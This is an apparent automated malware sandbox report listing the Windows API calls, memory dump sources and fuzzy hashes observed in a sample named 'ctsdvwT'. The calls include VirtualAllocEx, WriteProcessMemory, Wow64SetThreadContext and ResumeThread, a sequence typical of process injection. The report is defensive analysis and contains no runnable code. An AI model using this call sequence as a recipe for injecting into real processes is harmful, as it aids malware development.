                                        • Instruction Fuzzy Hash: 7451D2B1C103499FDB14DF99C884ADEBFB5FF48350F24812AE819AB250D775A986CF90
                                        APIs
                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 03281A02
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2250560868.0000000003280000.00000040.00000800.00020000.00000000.sdmp, Offset: 03280000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_3280000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: CreateWindow
                                        • String ID:
                                        • API String ID: 716092398-0
                                        • Opcode ID: 8b39e47f2025681a12d69c782288b8364d1eddc0a6c5591e2cee2871435c44ce
                                        • Instruction ID: e2476cf027b35e4db810535a4da9d6cfaf36794c6677f05293887afd3db29543
                                        • Opcode Fuzzy Hash: 8b39e47f2025681a12d69c782288b8364d1eddc0a6c5591e2cee2871435c44ce
                                        • Instruction Fuzzy Hash: 3541C0B1D10349DFDB14DF99C884ADEFBB6BF48310F24812AE819AB250D774A985CF90
                                        APIs
                                        • CreateActCtxA.KERNEL32(?), ref: 014D59C9
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2248003028.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_14d0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: Create
                                        • String ID:
                                        • API String ID: 2289755597-0
                                        • Opcode ID: ce9ecd3ec08e6981cbc1ba09408968946c2298d884e8d98d1f640741a04393be
                                        • Instruction ID: a0b48288b784e4c354648996ab198baa1c91533be2d2b3857d16f8119c8981f7
                                        • Opcode Fuzzy Hash: ce9ecd3ec08e6981cbc1ba09408968946c2298d884e8d98d1f640741a04393be
                                        • Instruction Fuzzy Hash: D341D3B1D00719CFDB24CFA9C884A9EBBF1BF49304F20806AD418AB265DB756946CF91
                                        APIs
                                        • CreateActCtxA.KERNEL32(?), ref: 014D59C9
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2248003028.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_14d0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: Create
                                        • String ID:
                                        • API String ID: 2289755597-0
                                        • Opcode ID: 52d5ab542ba8ac0fdf75d9495c4511f5031d5a7b4e73265d944370c28308c3ab
                                        • Instruction ID: 6fe19f0d1cb3b4f5e38718d73a03acdada5640a916c7389412ad33f1845126dd
                                        • Opcode Fuzzy Hash: 52d5ab542ba8ac0fdf75d9495c4511f5031d5a7b4e73265d944370c28308c3ab
                                        • Instruction Fuzzy Hash: FD41D2B1C00719CBDF24DFA9C854B9EBBF5BF49304F20806AD408AB265DB756946CF91
                                        APIs
                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 03284111
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2250560868.0000000003280000.00000040.00000800.00020000.00000000.sdmp, Offset: 03280000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_3280000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: CallProcWindow
                                        • String ID:
                                        • API String ID: 2714655100-0
                                        • Opcode ID: 1f34f43bf4c214a0b7acccae63edab019c1fad9a1ba27e21fdab4317d1b5c59c
                                        • Instruction ID: f08ba97d538d19d1bcf8860cfc41db435b4a0240109630c705511ee93dc7d5bf
                                        • Opcode Fuzzy Hash: 1f34f43bf4c214a0b7acccae63edab019c1fad9a1ba27e21fdab4317d1b5c59c
                                        • Instruction Fuzzy Hash: 28413AB4A103058FDB14DF8AC448AAAFBF5FF88314F25C459D519A7361D375A841CFA0
                                        APIs
                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 01831DA8
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2249331157.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_1830000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: MemoryProcessRead
                                        • String ID:
                                        • API String ID: 1726664587-0
                                        APIs
                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 01831CC8
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2249331157.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_1830000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: MemoryProcessWrite
                                        • String ID:
                                        • API String ID: 3559483778-0
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 014DD707
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2248003028.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_14d0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        APIs
                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 01831DA8
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2249331157.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_1830000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: MemoryProcessRead
                                        • String ID:
                                        • API String ID: 1726664587-0
                                        APIs
                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 018316E6
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2249331157.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_1830000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: ContextThreadWow64
                                        • String ID:
                                        • API String ID: 983334009-0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2249331157.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_1830000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        APIs
                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 01831DA8
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2249331157.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_1830000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: MemoryProcessRead
                                        • String ID:
                                        • API String ID: 1726664587-0
                                        APIs
                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 018316E6
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2249331157.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_1830000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: ContextThreadWow64
                                        • String ID:
                                        • API String ID: 983334009-0
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 014DD707
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2248003028.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_14d0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        APIs
                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,014DB079,00000800,00000000,00000000), ref: 014DB28A
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2248003028.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_14d0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID:
                                        • API String ID: 1029625771-0
                                        APIs
                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 01831BE6
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2249331157.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_1830000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        APIs
                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,014DB079,00000800,00000000,00000000), ref: 014DB28A
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2248003028.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_14d0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID:
                                        • API String ID: 1029625771-0
                                        APIs
                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 01831BE6
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2249331157.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_1830000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2249331157.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_1830000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        APIs
                                        • FindCloseChangeNotification.KERNELBASE(?), ref: 01837E28
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2249331157.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_1830000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: ChangeCloseFindNotification
                                        • String ID:
                                        • API String ID: 2591292051-0
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 014DAFFE
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2248003028.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_14d0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        APIs
                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 018351FD
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2249331157.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_1830000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: MessagePost
                                        • String ID:
                                        • API String ID: 410705778-0
                                        APIs
                                        • FindCloseChangeNotification.KERNELBASE(?), ref: 01837E28
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2249331157.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_1830000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: ChangeCloseFindNotification
                                        • String ID:
                                        • API String ID: 2591292051-0
                                        APIs
                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 018351FD
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2249331157.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_1830000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: MessagePost
                                        • String ID:
                                        • API String ID: 410705778-0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Haq
                                        • API String ID: 0-725504367
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: r
                                        • API String ID: 0-1812594589
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Te]q
                                        • API String ID: 0-52440209
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4']q
                                        • API String ID: 0-1259897404
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Te]q
                                        • API String ID: 0-52440209
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Te]q
                                        • API String ID: 0-52440209
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 415744f5a44bb571dfffd76a5ef4fdf1ab5477e69d695e17c20d533f6394c8cb
                                        • Instruction ID: ecbfaa9f3b702e4e3e661946726afbe328f9a16034721f5d677619dece1b0854
                                        • Opcode Fuzzy Hash: 415744f5a44bb571dfffd76a5ef4fdf1ab5477e69d695e17c20d533f6394c8cb
                                        • Instruction Fuzzy Hash: FCB15875600701CFC305EF28D994A9ABBF6FF89300B5884AED45A8B375EB31E945CB91
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6a273e82b4df21c1a811f9d192abb977d219a54200334824232c2970722ef626
                                        • Instruction ID: 8f74006a4af489a3e7c00365782be2effe7b8c3ee3394ff1a313363e205bfd34
                                        • Opcode Fuzzy Hash: 6a273e82b4df21c1a811f9d192abb977d219a54200334824232c2970722ef626
                                        • Instruction Fuzzy Hash: 6AB16975600701CFC305EF28D994A9ABBF6FF89300B5485AED45A8B365EB30A946CB91
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 13fc1a9622f9b9da984b65d58657f913b3050cd9df78747096b8edc15c3eac0c
                                        • Instruction ID: 6255d2ec7737283784d60c64ec38784246c05e88ef5861d4a3a3c28d75ce5708
                                        • Opcode Fuzzy Hash: 13fc1a9622f9b9da984b65d58657f913b3050cd9df78747096b8edc15c3eac0c
                                        • Instruction Fuzzy Hash: 9EB18C746007018FC309EF28D494A9ABBF6FF89300F5489AED45A9B365DF30A946CB91
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5db201d7a3bc43f9210bd4fde095573db02bdbd1c0ea312286ff059d260b6daf
                                        • Instruction ID: 00a7953f4b04cd0b63f4cdf75e8cb9776ac3cd0b2c358e961bc39def40e2551d
                                        • Opcode Fuzzy Hash: 5db201d7a3bc43f9210bd4fde095573db02bdbd1c0ea312286ff059d260b6daf
                                        • Instruction Fuzzy Hash: BAB18C746007018FC309EF28D994A9ABBF6FF89300B54886ED45A8B365DF34AD45CB91
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6783c05b9b6c03b0bea8dc14980d05dcdb7350ae99989de2818ca41cf678f3f4
                                        • Instruction ID: d3d32a70ec0a1bde1cbb64db86d3a0a651e8d9ef4369b3ee65fb7321a76c6ed9
                                        • Opcode Fuzzy Hash: 6783c05b9b6c03b0bea8dc14980d05dcdb7350ae99989de2818ca41cf678f3f4
                                        • Instruction Fuzzy Hash: 05B18A74610701CFC305EF28D894A9ABBF6FF89300B5488AED45A8B375EB34E945CB91
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3b289282dcedca8528bc87f501b0d4699ccc358d710734d89a104da40486fdfb
                                        • Instruction ID: 3e35cdf99e4c38fcfdf52b546ac01b652bbe9f6306b9da42d71c033faff30f99
                                        • Opcode Fuzzy Hash: 3b289282dcedca8528bc87f501b0d4699ccc358d710734d89a104da40486fdfb
                                        • Instruction Fuzzy Hash: D7A18B74610701CFC305EF38D594A9ABBF6FF89300F5489AED45A8B365EB30A946CB91
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 72c2e37192dbf08fd09dbe3f3ae618ef1285244032e0c2a7add04b5a8d82d3e4
                                        • Instruction ID: 52fb1c298fa38f59b1b2a41bb6c809b9a9027fa09b0303973c62ffa170a27cda
                                        • Opcode Fuzzy Hash: 72c2e37192dbf08fd09dbe3f3ae618ef1285244032e0c2a7add04b5a8d82d3e4
                                        • Instruction Fuzzy Hash: 94B17C746007018FC305EF38D494A9ABBF6FF89300F54896ED45A8B365EF34A946CB91
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c16304964935af2c3304e57a82441b40ef00f0a58f0f062611f91621798f2eb2
                                        • Instruction ID: da0a5406565c2cb0341c9ed08cd5257440477de4a0c588cf4863480b92f9d0fc
                                        • Opcode Fuzzy Hash: c16304964935af2c3304e57a82441b40ef00f0a58f0f062611f91621798f2eb2
                                        • Instruction Fuzzy Hash: 67A17B746107018FC305EF38D894A9ABBF6FF89300F5488AED45A8B375EB34A945CB91
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 973b895bec2731eae616ee080a861be4c17fc3e51b24a92b01df5bc8e7931a72
                                        • Instruction ID: 0068b202c1af503ca03ecef75188ed121e8a2299ae7d1d0ec1dcdda9d76d3d37
                                        • Opcode Fuzzy Hash: 973b895bec2731eae616ee080a861be4c17fc3e51b24a92b01df5bc8e7931a72
                                        • Instruction Fuzzy Hash: 7BA16A756007018FC305EF28D594A9ABBF6FF89300F5488AED45A8B375DB30A946CB91
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5181035a6d907fc183d375ea4b5c632f6e55d7fba1fc95e02dc91692ece4ebca
                                        • Instruction ID: ec4cec9a8b08cc3b7e57cc1b5c10b97fe6d6189569473df126d77299f6ed503b
                                        • Opcode Fuzzy Hash: 5181035a6d907fc183d375ea4b5c632f6e55d7fba1fc95e02dc91692ece4ebca
                                        • Instruction Fuzzy Hash: 25B16A756107018FC305EF38D494A9ABBF6FF89300F5488AED45A8B375EB34A946CB91
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 27ced0bf019f3b2a88203476cbb1ab7afaae7f8fae218cc5d85d1166621943d8
                                        • Instruction ID: f7e14dc4914ebd9e36828bd4c8f8cf92d7a7499c5b99204e3539811cb7e6fc50
                                        • Opcode Fuzzy Hash: 27ced0bf019f3b2a88203476cbb1ab7afaae7f8fae218cc5d85d1166621943d8
                                        • Instruction Fuzzy Hash: 08A16B756007018FC345EF38D894A9ABBF6FF89300B5488AED45A8B375DB30A945CB91
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 55ccd9c2439f675f729ba259a2123a161137af4b6db6e54fd28b3db9334b8d29
                                        • Instruction ID: 94f8fb2bf3980029448daf2b2ecd6550fddfa2c2ac67b411d6383d6cf286cf2e
                                        • Opcode Fuzzy Hash: 55ccd9c2439f675f729ba259a2123a161137af4b6db6e54fd28b3db9334b8d29
                                        • Instruction Fuzzy Hash: CCA17C742107018FC309EF38D594A9ABBF6FF89300F54896ED45A8B365EF34A946CB91
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dcc8e1b9ec578b160622faf8fa5e9a1170c3f0714d51defb117d17246d5b899c
                                        • Instruction ID: 17a2a42903d3c25d2768b7a9fc5960e8f09ba46a3bcf27c32e242c0790da519d
                                        • Opcode Fuzzy Hash: dcc8e1b9ec578b160622faf8fa5e9a1170c3f0714d51defb117d17246d5b899c
                                        • Instruction Fuzzy Hash: 8BA18C746107018FC309EF38D494A9ABBF6FF89300F54886ED45A8B365EF30A946CB91
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a513a90c43b98ecfadb63dabf35c77d12881018c42255ec1b60320be624a2f3f
                                        • Instruction ID: c03f5c364c3e94987e211f934dffecf4fa4e7f5d0adc76db53f85466f9c0fcda
                                        • Opcode Fuzzy Hash: a513a90c43b98ecfadb63dabf35c77d12881018c42255ec1b60320be624a2f3f
                                        • Instruction Fuzzy Hash: 16A16B746107018FC305EF38D494A9ABBF6FF89300F5489AED45A8B365EF34A946CB91
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ab07627917d54ea88acee607d93cf15cfb61558129a762b8e6dde3976be13303
                                        • Instruction ID: cb56b8628d5d358b551057f7df2e1fbfed9c3c307c414a1f7213e8121a777dfb
                                        • Opcode Fuzzy Hash: ab07627917d54ea88acee607d93cf15cfb61558129a762b8e6dde3976be13303
                                        • Instruction Fuzzy Hash: B19139742107018FC349EF38D594A9ABBF6FF89300B54886ED45A8B375EF34A946CB91
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4936bf6e4a4428b0f3a26d16eb033aafba663c97977a6ea566af85c770c7d770
                                        • Instruction ID: 654c97aa6fd1287239919e6c2c1365bc5e82e87a42de019ee8045306f47493a0
                                        • Opcode Fuzzy Hash: 4936bf6e4a4428b0f3a26d16eb033aafba663c97977a6ea566af85c770c7d770
                                        • Instruction Fuzzy Hash: 20812874610B008FC749EF38D494AAABBE6FF89300B50896DD05A8B374EF35AD45CB91
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 894a10d09bb4d4aba21492c8bd1783c7062216a1a7256a56367d35e82edb3321
                                        • Instruction ID: e7a3f36b2c01ba88a6de3a20c61b233e8054bbce221cf60f7fe9fdbf8d10c44f
                                        • Opcode Fuzzy Hash: 894a10d09bb4d4aba21492c8bd1783c7062216a1a7256a56367d35e82edb3321
                                        • Instruction Fuzzy Hash: 935146B0D06255CFD711CF68C684A8EBBB2FF4A316F59D1A6D0089B212C330E985CF91
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 03a127f1477bc3636775685eda0d9cbafd5995c6a42410ff749f30fffcc58c94
                                        • Instruction ID: 1dc13ac5fe3aa699b5f4044b8965b65e04bd32ac77c3c0a9510d4a27edca2fd2
                                        • Opcode Fuzzy Hash: 03a127f1477bc3636775685eda0d9cbafd5995c6a42410ff749f30fffcc58c94
                                        • Instruction Fuzzy Hash: 0B51C1B4919684DFC306CB69E554958BFF0EF8A300B2A80D6D484DB2B3CB35AD15C712
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
